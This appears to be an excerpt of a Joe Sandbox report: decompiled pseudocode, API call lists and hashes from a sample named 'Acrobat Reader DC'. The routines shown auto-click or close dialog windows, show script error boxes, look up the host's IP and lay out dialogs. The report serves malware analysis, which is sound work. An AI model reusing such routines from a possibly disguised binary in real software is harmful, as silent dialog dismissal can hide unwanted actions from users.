                                  						_t28 = _t22[1];
                                  						_t35 = _t25;
                                  						if(_t35 > 0 || _t35 >= 0 && _t5 >= _t28) {
                                  							break;
                                  						}
                                  						Sleep(0xa);
                                  						if( *0x4974ef != 0) {
                                  							continue;
                                  						} else {
                                  							return 0;
                                  						}
                                  						goto L13;
                                  					}
                                  					 *0x4a7538 = 0;
                                  					EnumThreadWindows( *_t22, E00433D09, 0);
                                  					_t8 =  *0x4a7538; // 0x0
                                  					if(_t8 != 0) {
                                  						 *0x4974ee = 1;
                                  						_t9 = FindWindowExW(_t8, 0, L"BUTTON", 0);
                                  						_t24 =  *0x4a7538; // 0x0
                                  						_t30 = _t9;
                                  						if(_t30 == 0) {
                                  							SendMessageW(_t24, 0x10, 0, 0);
                                  							Sleep(0xfa);
                                  							_t26 =  *0x4a7538; // 0x0
                                  							if(IsWindow(_t26) == 0) {
                                  								goto L12;
                                  							} else {
                                  								_t12 =  *0x4a7538; // 0x0
                                  								EndDialog(_t12, 0);
                                  								return 0;
                                  							}
                                  						} else {
                                  							E004439C1(_t24, 1);
                                  							_t27 =  *0x4a7538; // 0x0
                                  							SetActiveWindow(_t27);
                                  							SendMessageW(_t30, 0xf5, 0, 0);
                                  							_t18 =  *0x4a7538; // 0x0
                                  							E004439C1(_t18, 0);
                                  							return 0;
                                  						}
                                  					} else {
                                  						goto L12;
                                  					}
                                  				}
                                  				L13:
                                  			}



















                                  APIs
                                  • timeGetTime.WINMM ref: 00443B67
                                    • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                  • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                  • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                  • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                  • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                  • IsWindow.USER32(00000000), ref: 00443C3A
                                  • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                    • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                    • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                    • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                  • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                  • String ID: BUTTON
                                  • API String ID: 1834419854-3405671355
                                  • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                  • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                  • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                  • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 74%
                                  			E00454014(void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                  				WCHAR* _v24;
                                  				WCHAR* _v40;
                                  				short _v8232;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				intOrPtr _t29;
                                  				intOrPtr _t49;
                                  				void* _t56;
                                  				void* _t73;
                                  				void* _t75;
                                  
                                  				_t75 = __fp0;
                                  				_t73 = __eflags;
                                  				E00422240(0x2028);
                                  				_t49 = _a4;
                                  				_t50 =  *(_t49 + 0x48);
                                  				LoadStringW(GetModuleHandleW(0),  *(_t49 + 0x48),  &_v8232, 0xfff);
                                  				_t67 =  &_v40;
                                  				E00401B10( &_v8232,  &_v40, _t73);
                                  				_t74 =  *((char*)(_t49 + 3));
                                  				if( *((char*)(_t49 + 3)) == 0) {
                                  					_t29 = _a8;
                                  					__eflags = _t29;
                                  					if(_t29 != 0) {
                                  						_push(_t29);
                                  						E0041329B(_a12,  &_v8232, L"Line %d  (File \"%s\"):\n\n", _a12);
                                  					} else {
                                  						_t50 =  &_v8232;
                                  						E0041329B(_t56,  &_v8232, L"Line %d:\n\n", _a12);
                                  					}
                                  					_t68 =  &_v24;
                                  					E00401B10( &_v8232,  &_v24, __eflags);
                                  					E0040D200( &_v24, _t50, _a20, _t75);
                                  					E0040D200(_t68, _t50, L"\n\nError: ", _t75);
                                  					E0040D200(_t68, _t50, _a16, _t75);
                                  					E0040D200(_t68, _t50, L".\n\n", _t75);
                                  					MessageBoxW(0, _v24, _v40, 0x11010);
                                  					E00402250(_t68);
                                  					return E00402250( &_v40);
                                  				} else {
                                  					_push(0x484ea8);
                                  					_push(_a20);
                                  					_push(_a16);
                                  					_push(_a12);
                                  					_push(_a8);
                                  					_push(L"%s (%d) : ==> %s.: \n%s \n%s\n");
                                  					E00413ABE(_t49, _a8,  &_v8232,  &_v40, _t74);
                                  					return E00402250(_t67);
                                  				}
                                  			}
















                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                  • LoadStringW.USER32(00000000), ref: 00454040
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • _wprintf.LIBCMT ref: 00454074
                                  • __swprintf.LIBCMT ref: 004540A3
                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                  • API String ID: 455036304-4153970271
                                  • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                  • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                  • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                  • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 44%
                                  			E00433493(signed int _a4, intOrPtr _a8) {
                                  				char _v8;
                                  				char _v268;
                                  				char _v668;
                                  				char* _t14;
                                  				int _t16;
                                  				intOrPtr* _t17;
                                  				void* _t19;
                                  				void* _t24;
                                  				void* _t25;
                                  				intOrPtr* _t29;
                                  				void* _t31;
                                  				intOrPtr _t33;
                                  				signed int _t34;
                                  				void* _t35;
                                  
                                  				_t34 = _a4;
                                  				_t33 = _a8;
                                  				_t14 =  &_v668;
                                  				__imp__#115(0x101, _t14);
                                  				if(_t14 != 0) {
                                  					L8:
                                  					return E00411567(_t33, 0x484ea8);
                                  				} else {
                                  					_t16 = gethostname( &_v268, 0x100);
                                  					__imp__#52( &_v268);
                                  					if(_t16 == 0) {
                                  						goto L8;
                                  					} else {
                                  						_t17 =  *((intOrPtr*)(_t16 + 0xc));
                                  						_t31 = 0;
                                  						if( *_t17 != 0) {
                                  							_t29 = _t17;
                                  							do {
                                  								_t29 = _t29 + 4;
                                  								_t31 = _t31 + 1;
                                  							} while ( *_t29 != 0);
                                  						}
                                  						if(_t34 <= _t31) {
                                  							_t19 = E00410E60( &_v8,  *((intOrPtr*)(_t17 + _t34 * 4 - 4)), 4);
                                  							__imp__#11(_v8);
                                  							E00413650( &_v268, _t19);
                                  							_t35 = E0043299A( &_v268, 0xffffffff);
                                  							E00411567(_t33, _t35);
                                  							_t24 = E004111DC();
                                  							__imp__#116(_t35);
                                  							return _t24;
                                  						} else {
                                  							_t25 = E00411567(_t33, L"0.0.0.0");
                                  							__imp__#116();
                                  							return _t25;
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcscpy$Cleanup$Startup_memmovegethostbynamegethostnameinet_ntoa
                                  • String ID: 0.0.0.0
                                  • API String ID: 3306283345-3771769585
                                  • Opcode ID: 12bd0bd87adc01a11e762e32582fe9f9ee670ff773acf44d869f4b862077f2e3
                                  • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                  • Opcode Fuzzy Hash: 12bd0bd87adc01a11e762e32582fe9f9ee670ff773acf44d869f4b862077f2e3
                                  • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 29%
                                  			E00467C8E(intOrPtr* _a4, signed short* _a8) {
                                  				char _v8;
                                  				signed short* _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v36;
                                  				signed short _v44;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t100;
                                  				intOrPtr _t105;
                                  				signed int _t109;
                                  				signed int _t110;
                                  				signed int _t113;
                                  				void* _t120;
                                  				signed int _t135;
                                  				signed int _t139;
                                  				signed int _t146;
                                  				signed short* _t154;
                                  				void* _t155;
                                  				signed int _t157;
                                  				signed short _t161;
                                  				signed int _t183;
                                  				void* _t199;
                                  				signed short* _t202;
                                  				signed int _t204;
                                  				signed int _t208;
                                  				signed int _t210;
                                  				intOrPtr* _t212;
                                  				void* _t218;
                                  				void* _t219;
                                  				void* _t220;
                                  				void* _t227;
                                  
                                  				_t154 = _a8;
                                  				_t100 =  *_t154 & 0x0000ffff;
                                  				_t219 = _t218 - 0x2c;
                                  				_t212 = _a4;
                                  				if((_t100 & 0x00002000) == 0) {
                                  					L13:
                                  					return 0;
                                  				} else {
                                  					if((_t100 & 0x00004000) == 0) {
                                  						_t154 = _t154[4];
                                  						_v12 = _t154;
                                  						_t202 = _t154;
                                  					} else {
                                  						_t202 =  *(_t154[4]);
                                  						_v12 = _t202;
                                  					}
                                  					if(_t202 == 0) {
                                  						goto L13;
                                  					} else {
                                  						E0040E950(_t212, _t154);
                                  						 *((intOrPtr*)( *_t212 + 0x210)) =  *_t202;
                                  						_t105 =  *_t212;
                                  						_t155 = 0;
                                  						if( *((intOrPtr*)(_t105 + 0x210)) > 0) {
                                  							_t13 =  &(_t202[8]); // 0x479a60
                                  							_t199 = 0x10c;
                                  							_a8 = _t13;
                                  							do {
                                  								_a8 =  &(_a8[4]);
                                  								 *(_t199 + _t105) =  *_a8;
                                  								_t105 =  *_t212;
                                  								_t155 = _t155 + 1;
                                  								_t199 = _t199 + 4;
                                  							} while (_t155 <  *((intOrPtr*)(_t105 + 0x210)));
                                  						}
                                  						E0040E830(_t212, _t155, 0);
                                  						_t146 =  *( *_t212 + 8);
                                  						_t157 = _t202[1] & 0x0000ffff;
                                  						_t109 = _t157 & 0x00000f00;
                                  						_t220 = _t219 + 4;
                                  						_t227 = _t109 - 0x400;
                                  						if(_t227 > 0) {
                                  							__eflags = _t109 - 0x800;
                                  							if(_t109 == 0x800) {
                                  								_t110 =  &_v24;
                                  								__imp__#23(_t202, _t110);
                                  								__eflags = _t110;
                                  								if(_t110 >= 0) {
                                  									_t204 = 0;
                                  									__eflags = _t146;
                                  									if(__eflags > 0) {
                                  										_a4 = 0;
                                  										do {
                                  											_push(0x10);
                                  											_t113 = E004115D7(_t204, _t212, __eflags);
                                  											_t220 = _t220 + 4;
                                  											__eflags = _t113;
                                  											if(_t113 == 0) {
                                  												_t113 = 0;
                                  												__eflags = 0;
                                  											} else {
                                  												 *_t113 = 0;
                                  												 *((intOrPtr*)(_t113 + 8)) = 1;
                                  												 *((intOrPtr*)(_t113 + 0xc)) = 0;
                                  											}
                                  											 *( *((intOrPtr*)( *_t212)) + _t204 * 4) = _t113;
                                  											_v44 = 0x400c;
                                  											_v36 = _a4 + _v24;
                                  											E00468070( *( *((intOrPtr*)( *_t212)) + _t204 * 4),  &_v44);
                                  											_a4 = _a4 + 0x10;
                                  											_t204 = _t204 + 1;
                                  											__eflags = _t204 - _t146;
                                  										} while (__eflags < 0);
                                  									}
                                  									goto L57;
                                  								}
                                  								goto L58;
                                  							} else {
                                  								goto L30;
                                  							}
                                  						} else {
                                  							if(_t227 == 0) {
                                  								__imp__#23(_t202,  &_v20);
                                  								__eflags = _t109;
                                  								if(_t109 < 0) {
                                  									goto L58;
                                  								} else {
                                  									_t208 = 0;
                                  									__eflags = _t146;
                                  									if(__eflags > 0) {
                                  										do {
                                  											_push(0x10);
                                  											_t135 = E004115D7(_t208, _t212, __eflags);
                                  											_t220 = _t220 + 4;
                                  											__eflags = _t135;
                                  											if(_t135 == 0) {
                                  												_t135 = 0;
                                  												__eflags = 0;
                                  											} else {
                                  												 *_t135 = 0;
                                  												 *((intOrPtr*)(_t135 + 8)) = 1;
                                  												 *((intOrPtr*)(_t135 + 0xc)) = 0;
                                  											}
                                  											 *( *((intOrPtr*)( *_t212)) + _t208 * 4) = _t135;
                                  											_v44 = 9;
                                  											_v36 = _v20 + _t208 * 4;
                                  											E00468070( *( *((intOrPtr*)( *_t212)) + _t208 * 4),  &_v44);
                                  											_t208 = _t208 + 1;
                                  											__eflags = _t208 - _t146;
                                  										} while (__eflags < 0);
                                  									}
                                  									__imp__#24(_v12);
                                  									return 1;
                                  								}
                                  							} else {
                                  								if(_t109 == 0x100) {
                                  									__imp__#23(_t202,  &_v16);
                                  									__eflags = _t109;
                                  									if(_t109 >= 0) {
                                  										_t210 = 0;
                                  										__eflags = _t146;
                                  										if(__eflags > 0) {
                                  											do {
                                  												_push(0x10);
                                  												_t139 = E004115D7(_t210, _t212, __eflags);
                                  												_t220 = _t220 + 4;
                                  												__eflags = _t139;
                                  												if(_t139 == 0) {
                                  													_t139 = 0;
                                  													__eflags = 0;
                                  												} else {
                                  													 *_t139 = 0;
                                  													 *((intOrPtr*)(_t139 + 8)) = 1;
                                  													 *((intOrPtr*)(_t139 + 0xc)) = 0;
                                  												}
                                  												 *( *((intOrPtr*)( *_t212)) + _t210 * 4) = _t139;
                                  												_v44 = 8;
                                  												_v36 =  *((intOrPtr*)(_v16 + _t210 * 4));
                                  												E00468070( *( *((intOrPtr*)( *_t212)) + _t210 * 4),  &_v44);
                                  												_t210 = _t210 + 1;
                                  												__eflags = _t210 - _t146;
                                  											} while (__eflags < 0);
                                  										}
                                  										L57:
                                  										__imp__#24(_v12);
                                  									}
                                  									goto L58;
                                  								} else {
                                  									if(_t109 != 0x200) {
                                  										L30:
                                  										__eflags = _t157;
                                  										if(_t157 >= 0) {
                                  											goto L12;
                                  										} else {
                                  											__imp__#77(_t202,  &_a8);
                                  											_t161 = _a8;
                                  											_t120 = (_t161 & 0x0000ffff) + 0xfffffffe;
                                  											__eflags = _t120 - 0x15;
                                  											if(_t120 > 0x15) {
                                  												L42:
                                  												_t183 = _t161 & 0x0000ffff;
                                  												__eflags = _t183 & 0x00004000;
                                  												if((_t183 & 0x00004000) == 0) {
                                  													goto L12;
                                  												} else {
                                  													goto L43;
                                  												}
                                  											} else {
                                  												_t51 = _t120 + 0x46805a; // 0x6608558b
                                  												switch( *((intOrPtr*)(( *_t51 & 0x000000ff) * 4 +  &M00468042))) {
                                  													case 0:
                                  														_a4 = 2;
                                  														goto L36;
                                  													case 1:
                                  														L43:
                                  														_a4 = 4;
                                  														goto L36;
                                  													case 2:
                                  														_a4 = 8;
                                  														goto L36;
                                  													case 3:
                                  														_a4 = 1;
                                  														L36:
                                  														_t121 =  &_v8;
                                  														_push(_t121);
                                  														_push(_t202);
                                  														__imp__#23();
                                  														__eflags = _t121;
                                  														if(_t121 < 0) {
                                  															L58:
                                  															return 1;
                                  														} else {
                                  															_t205 = 0;
                                  															__eflags = _t146;
                                  															if(__eflags > 0) {
                                  																do {
                                  																	_push(0x10);
                                  																	_t123 = E004115D7(_t205, _t212, __eflags);
                                  																	_t220 = _t220 + 4;
                                  																	__eflags = _t123;
                                  																	if(_t123 == 0) {
                                  																		_t123 = 0;
                                  																		__eflags = 0;
                                  																	} else {
                                  																		 *_t123 = 0;
                                  																		 *((intOrPtr*)(_t123 + 8)) = 1;
                                  																		 *((intOrPtr*)(_t123 + 0xc)) = 0;
                                  																	}
                                  																	 *( *((intOrPtr*)( *_t212)) + _t205 * 4) = _t123;
                                  																	_t124 = _a8;
                                  																	_t163 = _t124 & 0x0000ffff;
                                  																	__eflags = _t163 & 0x00004000;
                                  																	if((_t163 & 0x00004000) == 0) {
                                  																		_t187 = 0x00004000 | _t124;
                                  																		__eflags = _t187;
                                  																		_v44 = _t187;
                                  																		_v36 = _v8;
                                  																	} else {
                                  																		_v44 = _t124;
                                  																		E00410E60( &_v36, _v8, _a4);
                                  																		_t220 = _t220 + 0xc;
                                  																	}
                                  																	E00468070( *( *((intOrPtr*)( *_t212)) + _t205 * 4),  &_v44);
                                  																	_v8 = _v8 + _a4;
                                  																	_t205 = _t205 + 1;
                                  																	__eflags = _t205 - _t146;
                                  																} while (__eflags < 0);
                                  															}
                                  															_push(_v12);
                                  															__imp__#24();
                                  															return 1;
                                  														}
                                  														goto L59;
                                  													case 4:
                                  														_t130 =  &_v8;
                                  														_push(_t130);
                                  														_push(_t202);
                                  														__imp__#23();
                                  														__eflags = _t130;
                                  														if(__eflags < 0) {
                                  															goto L12;
                                  														} else {
                                  															E00410E60(E00453132(_v8, __eflags, _t212, _t146), _v8, _t146);
                                  															_push(_t202);
                                  															__imp__#24();
                                  															return 1;
                                  														}
                                  														goto L59;
                                  													case 5:
                                  														goto L42;
                                  												}
                                  											}
                                  										}
                                  									} else {
                                  										L12:
                                  										E00408F40(_t202, _t212);
                                  										goto L13;
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				L59:
                                  			}





































                                  APIs
                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                  • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                  • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                  • _memmove.LIBCMT ref: 00467EB8
                                  • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                  • _memmove.LIBCMT ref: 00467F6C
                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                  • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                  • String ID:
                                  • API String ID: 2170234536-0
                                  • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                  • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                  • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                  • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E004357B7(intOrPtr _a4, intOrPtr _a8, struct HWND__* _a12, struct HWND__* _a16) {
                                  				struct tagRECT _v20;
                                  				void* _t55;
                                  				struct HWND__* _t57;
                                  				struct HWND__* _t59;
                                  				struct HWND__* _t61;
                                  				struct HWND__* _t62;
                                  				long _t67;
                                  				signed int _t68;
                                  				int _t69;
                                  				long _t73;
                                  				long _t83;
                                  				signed int _t92;
                                  				long _t99;
                                  				signed int _t100;
                                  				long _t103;
                                  				signed int _t104;
                                  				signed int _t108;
                                  				int _t109;
                                  				long _t113;
                                  				signed int _t117;
                                  				signed int _t119;
                                  				long _t123;
                                  				struct HWND__* _t127;
                                  				int _t131;
                                  				signed int _t133;
                                  
                                  				_t92 = _a12;
                                  				_t131 = 0;
                                  				_t127 = _a16;
                                  				if(_a8 != 1) {
                                  					_t57 = GetDlgItem( *(_a4 + 0x54), 1);
                                  					_a12 = _t57;
                                  					if(_t57 != 0) {
                                  						GetWindowRect(_t57,  &_v20);
                                  						_t123 = _v20.left;
                                  						_t83 = _v20.right;
                                  						if(_t123 > _t83) {
                                  							_t113 = _t123;
                                  							_t123 = _t83;
                                  							_t83 = _t113;
                                  							_v20.left = _t123;
                                  							_v20.right = _t83;
                                  						}
                                  						_t133 = _v20.top;
                                  						_t108 = _v20.bottom;
                                  						if(_t133 > _t108) {
                                  							_a16 = _t133;
                                  							_t133 = _t108;
                                  							_t108 = _a16;
                                  							_v20.top = _t133;
                                  							_v20.bottom = _t108;
                                  						}
                                  						_t124 = _t83 - _t123;
                                  						_t109 = _t108 - _t133;
                                  						asm("cdq");
                                  						asm("cdq");
                                  						_t131 = _t127 - _t109 - 0xa;
                                  						MoveWindow(_a12, (0xa - _t83 - _t123 - _t83 - _t123 >> 1) + (_t92 + (_t124 & 0x00000003) >> 2), _t131, _t124, _t109, 0);
                                  					}
                                  					_t59 = GetDlgItem( *(_a4 + 0x54), 2);
                                  					_a16 = _t59;
                                  					if(_t59 != 0) {
                                  						GetWindowRect(_t59,  &_v20);
                                  						_t103 = _v20.left;
                                  						_t73 = _v20.right;
                                  						if(_t103 > _t73) {
                                  							_v20.left = _t73;
                                  							_t73 = _t103;
                                  							_v20.right = _t73;
                                  						}
                                  						_t119 = _v20.top;
                                  						_t104 = _v20.bottom;
                                  						if(_t119 > _t104) {
                                  							_v20.top = _t104;
                                  							_t104 = _t119;
                                  							_v20.bottom = _t104;
                                  						}
                                  						_t74 = _t73 - _v20.left;
                                  						asm("cdq");
                                  						asm("cdq");
                                  						MoveWindow(_a16, (_t92 + _t92 * 2 + (_t119 & 0x00000003) >> 2) - (_t73 - _v20.left + 0xa - _t119 >> 1), _t131, _t74, _t104 - _v20.top, 0);
                                  					}
                                  					_t61 = GetDlgItem( *(_a4 + 0x54), 0x3e9);
                                  					_a16 = _t61;
                                  					if(_t61 != 0) {
                                  						GetWindowRect(_t61,  &_v20);
                                  						_t67 = _v20.left;
                                  						_t99 = _v20.right;
                                  						if(_t67 > _t99) {
                                  							_v20.left = _t99;
                                  							_v20.right = _t67;
                                  						}
                                  						_t100 = _v20.top;
                                  						_t68 = _v20.bottom;
                                  						if(_t100 > _t68) {
                                  							_t117 = _t100;
                                  							_t100 = _t68;
                                  							_t68 = _t117;
                                  							_v20.top = _t100;
                                  							_v20.bottom = _t68;
                                  						}
                                  						_t69 = _t68 - _t100;
                                  						_t131 = _t131 + 0xfffffffb - _t69;
                                  						MoveWindow(_a16, 0xa, _t131, _t92 - 0x14, _t69, 0);
                                  					}
                                  					_t62 = GetDlgItem( *(_a4 + 0x54), 0x3ea);
                                  					if(_t62 != 0) {
                                  						MoveWindow(_t62, 0xa, 0xa, _t92 + 0xffffffec, _t131 + 0xfffffffb, 0);
                                  					}
                                  					return InvalidateRect( *(_a4 + 0x54), 0, 1);
                                  				}
                                  				return _t55;
                                  			}





























                                  APIs
                                  • GetDlgItem.USER32 ref: 004357DB
                                  • GetWindowRect.USER32 ref: 004357ED
                                  • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                  • GetDlgItem.USER32 ref: 0043586A
                                  • GetWindowRect.USER32 ref: 0043587C
                                  • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                  • GetDlgItem.USER32 ref: 004358DC
                                  • GetWindowRect.USER32 ref: 004358EE
                                  • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                  • GetDlgItem.USER32 ref: 00435941
                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$ItemMoveRect$Invalidate
                                  • String ID:
                                  • API String ID: 3096461208-0
